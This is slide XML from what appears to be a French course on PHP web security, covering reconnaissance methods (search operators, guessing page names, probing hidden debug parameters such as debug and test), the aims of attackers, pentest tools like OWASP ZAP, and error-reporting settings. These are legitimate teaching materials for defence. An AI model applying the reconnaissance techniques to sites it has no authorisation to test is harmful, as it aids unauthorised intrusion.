              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> pour rechercher uniquement dans les adresses URL des pages web.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>inurl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> même principe, pour rechercher une phrase complète.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:18</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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dirty="0" err="1" smtClean="0"/>
              <a:t>Mapper</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>l’application</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35843" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Inférence à partir du contenu publié</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Identifier le schéma d'appellation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Par exemple: S'il existe des pages appelées AddDocument.php et ViewDocument.php, il peut y avoir une page EditDocument.php, ...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les identificateurs tels que les nombres et les dates rendent la prédiction simple</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Le contenu HTML et </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> peut contenir des indices sur le contenu caché du code côté serveur.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> Rechercher des fichiers temporaires créés par des outils de développement et des éditeurs de fichiers (par exemple, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>file.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>-1 si file.php existe)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Découvrir les paramètres cachés</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Les pages se comportent différemment avec des paramètres cachés</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Par exemple. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>true</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Utilisez des listes de noms de paramètres de débogage courants:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Debug</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, test, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>hide</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>, source,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attaques, ça sert à quoi ?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Empêcher le déroulement correcte de l’application par brouillage des données</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Désorganiser les échanges et le fonctionnement de l’application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Usurper l’identité d’un interlocuteur pour utiliser l’application pour soi et/ou récupérer des données confidentielles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Prendre le contrôle partiel ou complet du système plus ou moins discrètement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Outils de tests d'intrusion </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:18</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="http://i1-win.softpedia-static.com/screenshots/OWASP-ZAP_1.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1071538" y="1857364"/>
            <a:ext cx="6939173" cy="5000636"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
      </p:pic>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Sources</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Sécurité web et PHP 5 - François </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>Gannaz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> – SILECS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Sécurité PHP5 et MySQL – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" dirty="0" smtClean="0"/>
              <a:t>Damien Seguy et Philippe Gamache – Eyrolles</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:18</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>51</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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attaques</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Attaque sur l'application elle-même</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Usurpation, Fraude, Vol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Attaque sur le système via l'application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Utilisation de PHP pour obtenir un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> et continuer l'intrusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Attaque sur l'hébergement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>PHP est utilisé par l'attaquant qui peut déposer des scripts pour attaquer d'autres comptes utilisateurs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Utilisation de l'hébergement pour spammer, DOS, …</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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31640" y="3429000"/>
            <a:ext cx="8229600" cy="1143000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Comment un pirates peut connaitre le code source de l’application que j’utilise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns="" xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40252407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Code source accessible</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Comment un pirates peut connaitre le code source de l’application que j’utilise ?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>J’utilise une application open source</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Une partie de mon code source s’affiche sur le navigateur suite à des erreurs ou des warning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Mode </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>débugage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t> actif en production</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="160000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Espace réservé de la date 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{00399EDD-1035-4F09-8CFE-9DCE77BD2F4A}" type="datetime11">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>00:09:17</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Espace réservé du numéro de diapositive 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C4DF6A13-7182-457A-9CB4-1842CEE646A8}" type="slidenum">
              <a:rPr lang="fr-FR" altLang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" altLang="fr-F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Gestion des erreurs</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Espace réservé du contenu 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Affichage des erreurs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Indispensable pour écrire son code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Très utile pour sécuriser en cours de développement (variables non définies)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Dangereux en production</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" smtClean="0"/>
              <a:t>Configuration</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>error_reporting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1" smtClean="0"/>
              <a:t>level</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>) change le niveau de signalement.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>Constantes utiles pour définir le niveau :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>0 Aucun signalement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>E_ALL Toutes les erreurs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>E_STRICT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>E_ERROR</a:t>
            </a:r>
          </a:p>
